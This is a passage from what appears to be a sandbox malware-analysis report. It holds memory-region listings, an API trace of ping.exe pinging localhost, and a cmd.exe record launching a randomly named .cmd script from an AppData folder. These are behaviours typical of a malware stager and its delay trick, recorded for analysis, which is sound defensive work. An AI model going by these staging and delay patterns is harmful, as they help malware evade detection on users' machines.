= 0x76a90000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 8546 start_va = 0x76b40000 end_va = 0x76c08fff entry_point = 0x76b40000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 8547 start_va = 0x76d70000 end_va = 0x76e0cfff entry_point = 0x76d70000 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 8548 start_va = 0x77380000 end_va = 0x773b4fff entry_point = 0x77380000 region_type = mapped_file name = "ws2_32.dll" filename = "\\Windows\\System32\\ws2_32.dll" (normalized: "c:\\windows\\system32\\ws2_32.dll") Region: id = 8549 start_va = 0x773c0000 end_va = 0x773d8fff entry_point = 0x773c0000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 8550 start_va = 0x773e0000 end_va = 0x7742dfff entry_point = 0x773e0000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 8551 start_va = 0x7f6f0000 end_va = 0x7f7effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f6f0000" filename = "" Region: id = 8552 start_va = 0x100000 end_va = 0x1c7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000100000" filename = "" Region: id = 8553 start_va = 0x76490000 end_va = 0x764aefff entry_point = 0x76490000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 8554 start_va = 0x76ca0000 end_va = 0x76d6bfff entry_point = 0x76ca0000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 8555 start_va = 0x1d0000 end_va = 0x1d6fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001d0000" filename = "" Region: id = 8556 start_va = 0x1e0000 end_va = 0x1e1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001e0000" filename = "" Region: id = 8557 start_va = 0x1f0000 end_va = 0x1f2fff entry_point = 0x1f0000 region_type = mapped_file name = "ping.exe.mui" filename = "\\Windows\\System32\\en-US\\ping.exe.mui" (normalized: "c:\\windows\\system32\\en-us\\ping.exe.mui") Region: id = 8558 start_va = 0x200000 end_va = 0x200fff entry_point = 0x0 region_type = private name = "private_0x0000000000200000" filename = "" Region: id = 8559 start_va = 0x210000 end_va = 0x210fff entry_point = 0x0 region_type = private name = "private_0x0000000000210000" filename = "" Region: id = 8560 start_va = 0x450000 end_va = 0x550fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000450000" filename = "" Region: id = 8561 start_va = 0x560000 end_va = 0x115ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000560000" filename = "" Region: id = 8601 start_va = 0x1160000 end_va = 0x142efff entry_point = 0x1160000 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Region: id = 8602 start_va = 0x74e10000 end_va = 0x74e4bfff entry_point = 0x74e10000 region_type = mapped_file name = "mswsock.dll" filename = "\\Windows\\System32\\mswsock.dll" (normalized: "c:\\windows\\system32\\mswsock.dll") Region: id = 8603 start_va = 0x1430000 end_va = 0x15dffff entry_point = 0x0 region_type = private name = "private_0x0000000001430000" filename = "" Region: id = 8604 start_va = 0x74960000 end_va = 0x74964fff entry_point = 0x74960000 region_type = mapped_file name = "wshtcpip.dll" filename = "\\Windows\\System32\\WSHTCPIP.DLL" (normalized: "c:\\windows\\system32\\wshtcpip.dll") Region: id = 8605 start_va = 0x74e00000 end_va = 0x74e05fff entry_point = 0x74e00000 region_type = mapped_file name = "wship6.dll" filename = "\\Windows\\System32\\wship6.dll" (normalized: "c:\\windows\\system32\\wship6.dll") Region: id = 8606 start_va = 0x74cd0000 end_va = 0x74d13fff entry_point = 0x74cd0000 region_type = mapped_file name = "dnsapi.dll" filename = "\\Windows\\System32\\dnsapi.dll" (normalized: "c:\\windows\\system32\\dnsapi.dll") Region: id = 8607 start_va = 0x250000 end_va = 0x2affff entry_point = 0x0 region_type = private name = "private_0x0000000000250000" filename = "" Region: id = 8615 start_va = 0x14e0000 end_va = 0x151ffff entry_point = 0x0 region_type = private name = "private_0x00000000014e0000" filename = "" Region: id = 8616 start_va = 0x15a0000 end_va = 0x15dffff entry_point = 0x0 region_type = private name = "private_0x00000000015a0000" filename = "" Region: id = 8617 start_va = 0x7ffde000 end_va = 0x7ffdefff entry_point = 0x0 region_type = private name = "private_0x000000007ffde000" filename = "" Region: id = 8618 start_va = 0x704a0000 end_va = 0x704a5fff entry_point = 0x704a0000 region_type = mapped_file name = "rasadhlp.dll" filename = "\\Windows\\System32\\rasadhlp.dll" (normalized: "c:\\windows\\system32\\rasadhlp.dll") Region: id = 8619 start_va = 0x736b0000 end_va = 0x736e7fff entry_point = 0x736b0000 region_type = mapped_file name = "fwpuclnt.dll" filename = "\\Windows\\System32\\FWPUCLNT.DLL" (normalized: "c:\\windows\\system32\\fwpuclnt.dll") Region: id = 8620 start_va = 0x15e0000 end_va = 0x16affff entry_point = 0x0 region_type = private name = "private_0x00000000015e0000" filename = "" Region: id = 8674 start_va = 0x1620000 end_va = 0x165ffff entry_point = 0x0 region_type = private name = "private_0x0000000001620000" filename = "" Region: id = 8675 start_va = 0x1670000 end_va = 0x16affff entry_point = 0x0 region_type = private name = "private_0x0000000001670000" filename = "" Region: id = 8676 start_va = 0x7ffdc000 end_va = 0x7ffdcfff entry_point = 0x0 region_type = private name = "private_0x000000007ffdc000" filename = "" Region: id = 8786 start_va = 0x310000 end_va = 0x34ffff entry_point = 0x0 region_type = private name = "private_0x0000000000310000" filename = "" Region: id = 8787 start_va = 0x7ffdb000 end_va = 0x7ffdbfff entry_point = 0x0 region_type = private name = "private_0x000000007ffdb000" filename = "" Thread: id = 94 os_tid = 0xe74 [0116.975] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x8fe04 | out: lpSystemTimeAsFileTime=0x8fe04*(dwLowDateTime=0x83074f20, dwHighDateTime=0x1d440a9)) [0116.975] GetCurrentProcessId () returned 0xe70 [0116.975] GetCurrentThreadId () returned 0xe74 [0116.975] GetTickCount () returned 0x27bf2 [0116.975] QueryPerformanceCounter (in: lpPerformanceCount=0x8fdfc | out: lpPerformanceCount=0x8fdfc*=17376443495) returned 1 [0116.976] GetModuleHandleA (lpModuleName=0x0) returned 0x240000 [0116.976] __set_app_type (_Type=0x1) [0116.976] __p__fmode () returned 0x76b331f4 [0116.976] __p__commode () returned 0x76b331fc [0116.976] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x242ae1) returned 0x0 [0116.976] __getmainargs (in: _Argc=0x2450d4, _Argv=0x2450dc, _Env=0x2450d8, _DoWildCard=0, _StartInfo=0x2450e8 | out: _Argc=0x2450d4, _Argv=0x2450dc, _Env=0x2450d8) returned 0 [0116.976] SetThreadUILanguage (LangId=0x0) returned 0x409 [0117.076] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0117.076] WSAStartup (in: wVersionRequired=0x2, lpWSAData=0x245440 | out: lpWSAData=0x245440) returned 0 [0117.082] RegOpenKeyExA (in: hKey=0x80000002, lpSubKey="SYSTEM\\CurrentControlSet\\Services\\Tcpip\\Parameters", ulOptions=0x0, samDesired=0x1, phkResult=0x8f894 | out: phkResult=0x8f894*=0x58) returned 0x0 [0117.082] RegQueryValueExA (in: hKey=0x58, lpValueName="DefaultTTL", lpReserved=0x0, lpType=0x8f888, lpData=0x8f890, lpcbData=0x8f88c*=0x4 | out: lpType=0x8f888*=0x0, lpData=0x8f890*=0x0, lpcbData=0x8f88c*=0x4) returned 0x2 [0117.082] RegCloseKey (hKey=0x58) returned 0x0 [0117.082] getaddrinfo (in: pNodeName="localhost", pServiceName=0x0, pHints=0x8f85c*(ai_flags=4, ai_family=0, ai_socktype=0, ai_protocol=0, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x8f884 | out: ppResult=0x8f884*=0x0) returned 11001 [0117.083] getaddrinfo (in: pNodeName="localhost", pServiceName=0x0, pHints=0x8f85c*(ai_flags=2, ai_family=0, ai_socktype=0, ai_protocol=0, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x8f884 | out: ppResult=0x8f884*=0x3746f0*(ai_flags=0, ai_family=23, ai_socktype=0, ai_protocol=0, ai_addrlen=0x1c, ai_canonname="cRh2YWu7", ai_addr=0x3747b8*(sa_family=23, sin6_port=0x0, sin6_flowinfo=0x0, sin6_addr="0000:0000:0000:0000:0000:0000:0000:0001", sin6_scope_id=0x0), ai_next=0x3747e0*(ai_flags=0, ai_family=2, ai_socktype=0, ai_protocol=0, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x373a18*(sa_family=2, sin_port=0x0, sin_addr="127.0.0.1"), ai_next=0x0))) returned 0 [0117.256] FreeAddrInfoW (pAddrInfo=0x3746f0*(ai_flags=0, ai_family=23, ai_socktype=0, ai_protocol=0, ai_addrlen=0x1c, ai_canonname="剣㉨坙㝵", ai_addr=0x3747b8*(sa_family=23, sin6_port=0x0, sin6_flowinfo=0x0, sin6_addr="0000:0000:0000:0000:0000:0000:0000:0001", sin6_scope_id=0x0), ai_next=0x3747e0*(ai_flags=0, ai_family=2, ai_socktype=0, ai_protocol=0, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x373a18*(sa_family=2, sin_port=0x0, sin_addr="127.0.0.1"), ai_next=0x0))) [0117.256] Icmp6CreateFile () returned 0x378b40 [0117.490] LocalAlloc (uFlags=0x0, uBytes=0x20) returned 0x374830 [0117.490] LocalAlloc (uFlags=0x0, uBytes=0x1ff8) returned 0x37ebb0 [0117.490] getnameinfo (in: pSockaddr=0x2455e0*(sa_family=23, sin6_port=0x0, sin6_flowinfo=0x0, sin6_addr="0000:0000:0000:0000:0000:0000:0000:0001", sin6_scope_id=0x0), SockaddrLength=0x1c, pNodeBuffer=0x8fd84, NodeBufferSize=0x41, pServiceBuffer=0x0, ServiceBufferSize=0x0, Flags=2 | out: pNodeBuffer="::1", pServiceBuffer=0x0) returned 0 [0117.490] FormatMessageA (in: dwFlags=0x900, lpSource=0x0, dwMessageId=0x2720, dwLanguageId=0x0, lpBuffer=0x8f884, nSize=0x0, Arguments=0x8f880 | out: lpBuffer="XH7") returned 0x19 [0117.490] CharToOemBuffA (in: lpszSrc="\r\nPinging cRh2YWu7 [::1] ", lpszDst=0x374858, cchDstLength=0x19 | out: lpszDst="\r\nPinging cRh2YWu7 [::1] ") returned 1 [0117.491] _setmode (_FileHandle=1, _Mode=32768) returned 16384 [0117.491] _write (in: _FileHandle=1, _Buf=0x374858*, _MaxCharCount=0x19 | out: _Buf=0x374858*) returned 25 [0117.491] _setmode (_FileHandle=1, _Mode=16384) returned 32768 [0117.491] LocalFree (hMem=0x374858) returned 0x0 [0117.491] FormatMessageA (in: dwFlags=0x900, lpSource=0x0, dwMessageId=0x275a, dwLanguageId=0x0, lpBuffer=0x8f888, nSize=0x0, Arguments=0x8f884 | out: lpBuffer="XH7") returned 0x18 [0117.491] CharToOemBuffA (in: lpszSrc="with 32 bytes of data:\r\n", lpszDst=0x374858, cchDstLength=0x18 | out: lpszDst="with 32 bytes of data:\r\n") returned 1 [0117.491] _setmode (_FileHandle=1, _Mode=32768) returned 16384 [0117.491] _write (in: _FileHandle=1, _Buf=0x374858*, _MaxCharCount=0x18 | out: _Buf=0x374858*) returned 24 [0117.491] _setmode (_FileHandle=1, _Mode=16384) returned 32768 [0117.491] LocalFree (hMem=0x374858) returned 0x0 [0117.491] SetConsoleCtrlHandler (HandlerRoutine=0x2417ca, Add=1) returned 1 [0117.491] Icmp6SendEcho2 (in: IcmpHandle=0x378b40, Event=0x0, ApcRoutine=0x0, ApcContext=0x0, SourceAddress=0x8f900, DestinationAddress=0x2455e0, RequestData=0x374830, RequestSize=0x20, RequestOptions=0x8f8b0, ReplyBuffer=0x37ebb0, ReplySize=0x1ff8, Timeout=0xfa0 | out: ReplyBuffer=0x37ebb0) returned 0x1 [0117.493] getnameinfo (in: pSockaddr=0x2455e0*(sa_family=23, sin6_port=0x0, sin6_flowinfo=0x0, sin6_addr="0000:0000:0000:0000:0000:0000:0000:0001", sin6_scope_id=0x0), SockaddrLength=0x1c, pNodeBuffer=0x8fd84, NodeBufferSize=0x41, pServiceBuffer=0x0, ServiceBufferSize=0x0, Flags=2 | out: pNodeBuffer="::1", pServiceBuffer=0x0) returned 0 [0117.493] FormatMessageA (in: dwFlags=0x900, lpSource=0x0, dwMessageId=0x2723, dwLanguageId=0x0, lpBuffer=0x8f888, nSize=0x0, Arguments=0x8f884 | out: lpBuffer=" Q7") returned 0x10 [0117.493] CharToOemBuffA (in: lpszSrc="Reply from ::1: ", lpszDst=0x375120, cchDstLength=0x10 | out: lpszDst="Reply from ::1: ") returned 1 [0117.493] _setmode (_FileHandle=1, _Mode=32768) returned 16384 [0117.493] _write (in: _FileHandle=1, _Buf=0x375120*, _MaxCharCount=0x10 | out: _Buf=0x375120*) returned 16 [0117.493] _setmode (_FileHandle=1, _Mode=16384) returned 32768 [0117.493] LocalFree (hMem=0x375120) returned 0x0 [0117.493] FormatMessageA (in: dwFlags=0x900, lpSource=0x0, dwMessageId=0x2727, dwLanguageId=0x0, lpBuffer=0x8f88c, nSize=0x0, Arguments=0x8f888 | out: lpBuffer="\x10<7") returned 0x9 [0117.493] CharToOemBuffA (in: lpszSrc="time<1ms ", lpszDst=0x373c10, cchDstLength=0x9 | out: lpszDst="time<1ms ") returned 1 [0117.493] _setmode (_FileHandle=1, _Mode=32768) returned 16384 [0117.493] _write (in: _FileHandle=1, _Buf=0x373c10*, _MaxCharCount=0x9 | out: _Buf=0x373c10*) returned 9 [0117.493] _setmode (_FileHandle=1, _Mode=16384) returned 32768 [0117.493] LocalFree (hMem=0x373c10) returned 0x0 [0117.493] FormatMessageA (in: dwFlags=0x900, lpSource=0x0, dwMessageId=0x273f, dwLanguageId=0x0, lpBuffer=0x8f88c, nSize=0x0, Arguments=0x8f888 | out: lpBuffer=" \x8f7") returned 0x2 [0117.493] CharToOemBuffA (in: lpszSrc="\r\n", lpszDst=0x378f20, cchDstLength=0x2 | out: lpszDst="\r\n") returned 1 [0117.494] _setmode (_FileHandle=1, _Mode=32768) returned 16384 [0117.494] _write (in: _FileHandle=1, _Buf=0x378f20*, _MaxCharCount=0x2 | out: _Buf=0x378f20*) returned 2 [0117.494] _setmode (_FileHandle=1, _Mode=16384) returned 32768 [0117.494] LocalFree (hMem=0x378f20) returned 0x0 [0117.494] Sleep (dwMilliseconds=0x3e8) [0118.653] Icmp6SendEcho2 (in: IcmpHandle=0x378b40, Event=0x0, ApcRoutine=0x0, ApcContext=0x0, SourceAddress=0x8f900, DestinationAddress=0x2455e0, RequestData=0x374830, RequestSize=0x20, RequestOptions=0x8f8b0, ReplyBuffer=0x37ebb0, ReplySize=0x1ff8, Timeout=0xfa0 | out: ReplyBuffer=0x37ebb0) returned 0x1 [0118.670] getnameinfo (in: pSockaddr=0x2455e0*(sa_family=23, sin6_port=0x0, sin6_flowinfo=0x0, sin6_addr="0000:0000:0000:0000:0000:0000:0000:0001", sin6_scope_id=0x0), SockaddrLength=0x1c, pNodeBuffer=0x8fd84, NodeBufferSize=0x41, pServiceBuffer=0x0, ServiceBufferSize=0x0, Flags=2 | out: pNodeBuffer="::1", pServiceBuffer=0x0) returned 0 [0118.670] FormatMessageA (in: dwFlags=0x900, lpSource=0x0, dwMessageId=0x2723, dwLanguageId=0x0, lpBuffer=0x8f888, nSize=0x0, Arguments=0x8f884 | out: lpBuffer=" Q7") returned 0x10 [0118.670] CharToOemBuffA (in: lpszSrc="Reply from ::1: ", lpszDst=0x375120, cchDstLength=0x10 | out: lpszDst="Reply from ::1: ") returned 1 [0118.670] _setmode (_FileHandle=1, _Mode=32768) returned 16384 [0118.670] _write (in: _FileHandle=1, _Buf=0x375120*, _MaxCharCount=0x10 | out: _Buf=0x375120*) returned 16 [0118.670] _setmode (_FileHandle=1, _Mode=16384) returned 32768 [0118.670] LocalFree (hMem=0x375120) returned 0x0 [0118.670] FormatMessageA (in: dwFlags=0x900, lpSource=0x0, dwMessageId=0x2727, dwLanguageId=0x0, lpBuffer=0x8f88c, nSize=0x0, Arguments=0x8f888 | out: lpBuffer="\x10<7") returned 0x9 [0118.670] CharToOemBuffA (in: lpszSrc="time<1ms ", lpszDst=0x373c10, cchDstLength=0x9 | out: lpszDst="time<1ms ") returned 1 [0118.670] _setmode (_FileHandle=1, _Mode=32768) returned 16384 [0118.670] _write (in: _FileHandle=1, _Buf=0x373c10*, _MaxCharCount=0x9 | out: _Buf=0x373c10*) returned 9 [0118.671] _setmode (_FileHandle=1, _Mode=16384) returned 32768 [0118.671] LocalFree (hMem=0x373c10) returned 0x0 [0118.671] FormatMessageA (in: dwFlags=0x900, lpSource=0x0, dwMessageId=0x273f, dwLanguageId=0x0, lpBuffer=0x8f88c, nSize=0x0, Arguments=0x8f888 | out: lpBuffer=" \x8f7") returned 0x2 [0118.671] CharToOemBuffA (in: lpszSrc="\r\n", lpszDst=0x378f20, cchDstLength=0x2 | out: lpszDst="\r\n") returned 1 [0118.671] _setmode (_FileHandle=1, _Mode=32768) returned 16384 [0118.671] _write (in: _FileHandle=1, _Buf=0x378f20*, _MaxCharCount=0x2 | out: _Buf=0x378f20*) returned 2 [0118.671] _setmode (_FileHandle=1, _Mode=16384) returned 32768 [0118.671] LocalFree (hMem=0x378f20) returned 0x0 [0118.671] Sleep (dwMilliseconds=0x3e8) [0119.854] Icmp6SendEcho2 (in: IcmpHandle=0x378b40, Event=0x0, ApcRoutine=0x0, ApcContext=0x0, SourceAddress=0x8f900, DestinationAddress=0x2455e0, RequestData=0x374830, RequestSize=0x20, RequestOptions=0x8f8b0, ReplyBuffer=0x37ebb0, ReplySize=0x1ff8, Timeout=0xfa0 | out: ReplyBuffer=0x37ebb0) returned 0x1 [0119.966] getnameinfo (in: pSockaddr=0x2455e0*(sa_family=23, sin6_port=0x0, sin6_flowinfo=0x0, sin6_addr="0000:0000:0000:0000:0000:0000:0000:0001", sin6_scope_id=0x0), SockaddrLength=0x1c, pNodeBuffer=0x8fd84, NodeBufferSize=0x41, pServiceBuffer=0x0, ServiceBufferSize=0x0, Flags=2 | out: pNodeBuffer="::1", pServiceBuffer=0x0) returned 0 [0119.966] FormatMessageA (in: dwFlags=0x900, lpSource=0x0, dwMessageId=0x2723, dwLanguageId=0x0, lpBuffer=0x8f888, nSize=0x0, Arguments=0x8f884 | out: lpBuffer=" Q7") returned 0x10 [0119.966] CharToOemBuffA (in: lpszSrc="Reply from ::1: ", lpszDst=0x375120, cchDstLength=0x10 | out: lpszDst="Reply from ::1: ") returned 1 [0119.966] _setmode (_FileHandle=1, _Mode=32768) returned 16384 [0119.966] _write (in: _FileHandle=1, _Buf=0x375120*, _MaxCharCount=0x10 | out: _Buf=0x375120*) returned 16 [0119.966] _setmode (_FileHandle=1, _Mode=16384) returned 32768 [0119.966] LocalFree (hMem=0x375120) returned 0x0 [0119.966] FormatMessageA (in: dwFlags=0x900, lpSource=0x0, dwMessageId=0x2727, dwLanguageId=0x0, lpBuffer=0x8f88c, nSize=0x0, Arguments=0x8f888 | out: lpBuffer="\x10<7") returned 0x9 [0119.966] CharToOemBuffA (in: lpszSrc="time<1ms ", lpszDst=0x373c10, cchDstLength=0x9 | out: lpszDst="time<1ms ") returned 1 [0119.966] _setmode (_FileHandle=1, _Mode=32768) returned 16384 [0119.966] _write (in: _FileHandle=1, _Buf=0x373c10*, _MaxCharCount=0x9 | out: _Buf=0x373c10*) returned 9 [0119.966] _setmode (_FileHandle=1, _Mode=16384) returned 32768 [0119.966] LocalFree (hMem=0x373c10) returned 0x0 [0119.966] FormatMessageA (in: dwFlags=0x900, lpSource=0x0, dwMessageId=0x273f, dwLanguageId=0x0, lpBuffer=0x8f88c, nSize=0x0, Arguments=0x8f888 | out: lpBuffer=" \x8f7") returned 0x2 [0119.967] CharToOemBuffA (in: lpszSrc="\r\n", lpszDst=0x378f20, cchDstLength=0x2 | out: lpszDst="\r\n") returned 1 [0119.967] _setmode (_FileHandle=1, _Mode=32768) returned 16384 [0119.967] _write (in: _FileHandle=1, _Buf=0x378f20*, _MaxCharCount=0x2 | out: _Buf=0x378f20*) returned 2 [0119.967] _setmode (_FileHandle=1, _Mode=16384) returned 32768 [0119.967] LocalFree (hMem=0x378f20) returned 0x0 [0119.967] getnameinfo (in: pSockaddr=0x2455e0*(sa_family=23, sin6_port=0x0, sin6_flowinfo=0x0, sin6_addr="0000:0000:0000:0000:0000:0000:0000:0001", sin6_scope_id=0x0), SockaddrLength=0x1c, pNodeBuffer=0x8f850, NodeBufferSize=0x41, pServiceBuffer=0x0, ServiceBufferSize=0x0, Flags=2 | out: pNodeBuffer="::1", pServiceBuffer=0x0) returned 0 [0119.967] FormatMessageA (in: dwFlags=0x900, lpSource=0x0, dwMessageId=0x274f, dwLanguageId=0x0, lpBuffer=0x8f820, nSize=0x0, Arguments=0x8f81c | out: lpBuffer="\xd0\x14\x38") returned 0x56 [0119.967] CharToOemBuffA (in: lpszSrc="\r\nPing statistics for ::1:\r\n Packets: Sent = 3, Received = 3, Lost = 0 (0% loss),\r\n", lpszDst=0x3814d0, cchDstLength=0x56 | out: lpszDst="\r\nPing statistics for ::1:\r\n Packets: Sent = 3, Received = 3, Lost = 0 (0% loss),\r\n") returned 1 [0119.967] _setmode (_FileHandle=1, _Mode=32768) returned 16384 [0119.967] _write (in: _FileHandle=1, _Buf=0x3814d0*, _MaxCharCount=0x56 | out: _Buf=0x3814d0*) returned 86 [0119.967] _setmode (_FileHandle=1, _Mode=16384) returned 32768 [0119.967] LocalFree (hMem=0x3814d0) returned 0x0 [0119.967] FormatMessageA (in: dwFlags=0x900, lpSource=0x0, dwMessageId=0x2753, dwLanguageId=0x0, lpBuffer=0x8f830, nSize=0x0, Arguments=0x8f82c | out: lpBuffer="\xe8\x14\x38") returned 0x61 [0119.967] CharToOemBuffA (in: lpszSrc="Approximate round trip times in milli-seconds:\r\n Minimum = 0ms, Maximum = 0ms, Average = 0ms\r\n", lpszDst=0x3814e8, cchDstLength=0x61 | out: lpszDst="Approximate round trip times in milli-seconds:\r\n Minimum = 0ms, Maximum = 0ms, Average = 0ms\r\n") returned 1 [0119.967] _setmode (_FileHandle=1, _Mode=32768) returned 16384 [0119.967] _write (in: _FileHandle=1, _Buf=0x3814e8*, _MaxCharCount=0x61 | out: _Buf=0x3814e8*) returned 97 [0119.967] _setmode (_FileHandle=1, _Mode=16384) returned 32768 [0119.967] LocalFree (hMem=0x3814e8) returned 0x0 [0119.967] IcmpCloseHandle (IcmpHandle=0x378b40) returned 1 [0120.052] LocalFree (hMem=0x374830) returned 0x0 [0120.052] LocalFree (hMem=0x37ebb0) returned 0x0 [0120.052] WSACleanup () returned 0 [0120.135] exit (_Code=0) Thread: id = 98 os_tid = 0xe90 Thread: id = 102 os_tid = 0xeb4 Thread: id = 103 os_tid = 0xeb8 Process: id = "59" image_name = "cmd.exe" filename = "c:\\windows\\system32\\cmd.exe" page_root = "0x7ea16820" os_pid = "0xe7c" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "50" os_parent_pid = "0xdf4" cmd_line = "\"C:\\Windows\\system32\\cmd.exe\" /C \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\vMfCCeRYkvQy\\KGiXH98V.cmd\"" cur_dir = "C:\\Users\\EEBsYm5\\Desktop\\" os_username = "CRH2YWU7\\EEBsYm5" os_groups = "CRH2YWU7\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea01" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 8567 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 8568 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 8569 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 8570 start_va = 0x190000 end_va = 0x28ffff entry_point = 0x0 region_type = private name = "private_0x0000000000190000" filename = "" Region: id = 8571 start_va = 0x4a9c0000 end_va = 0x4aa0bfff entry_point = 0x4a9c0000 region_type = mapped_file name = "cmd.exe" filename = "\\Windows\\System32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe") Region: id = 8572 start_va = 0x77230000 end_va = 0x7736bfff entry_point = 0x77230000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 8573 start_va = 0x77470000 end_va = 0x77470fff entry_point = 0x77470000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 8574 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 8575 start_va = 0x7ffde000 end_va = 0x7ffdefff entry_point = 0x0 region_type = private name = "private_0x000000007ffde000" filename = "" Region: id = 8576 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 8762 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 8763 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 8764 start_va = 0x50000 end_va = 0xb6fff entry_point = 0x50000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 8765 start_va = 0x450000 end_va = 0x45ffff entry_point = 0x0 region_type = private name = "private_0x0000000000450000" filename = "" Region: id = 8766 start_va = 0x480000 end_va = 0x57ffff entry_point = 0x0 region_type = private name = "private_0x0000000000480000" filename = "" Region: id = 8767 start_va = 0x6ee80000 end_va = 0x6ee86fff entry_point = 0x6ee80000 region_type = mapped_file name = "winbrand.dll" filename = "\\Windows\\System32\\winbrand.dll" (normalized: "c:\\windows\\system32\\winbrand.dll") Region: id = 8768 start_va = 0x75540000 end_va = 0x75589fff entry_point = 0x75540000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 8769 start_va = 0x76480000 end_va = 0x76489fff entry_point = 0x76480000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 8770 start_va = 0x76910000 end_va = 0x769e3fff entry_point = 0x76910000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 8771 start_va = 0x76a90000 end_va = 0x76b3bfff entry_point = 0x76a90000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 8772 start_va = 0x76b40000 end_va = 0x76c08fff entry_point = 0x76b40000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 8773 start_va = 0x76d70000 end_va = 0x76e0cfff entry_point = 0x76d70000 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 8774 start_va = 0x773e0000 end_va = 0x7742dfff entry_point = 0x773e0000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 8775 start_va = 0x7f6f0000 end_va = 0x7f7effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f6f0000" filename = "" Region: id = 8776 start_va = 0xc0000 end_va = 0x187fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000c0000" filename = "" Region: id = 8777 start_va = 0x76490000 end_va = 0x764aefff entry_point = 0x76490000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 8778 start_va = 0x76ca0000 end_va = 0x76d6bfff entry_point = 0x76ca0000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 8779 start_va = 0x290000 end_va = 0x390fff entry_point = 0x0 region_type = pagefile_backed name = 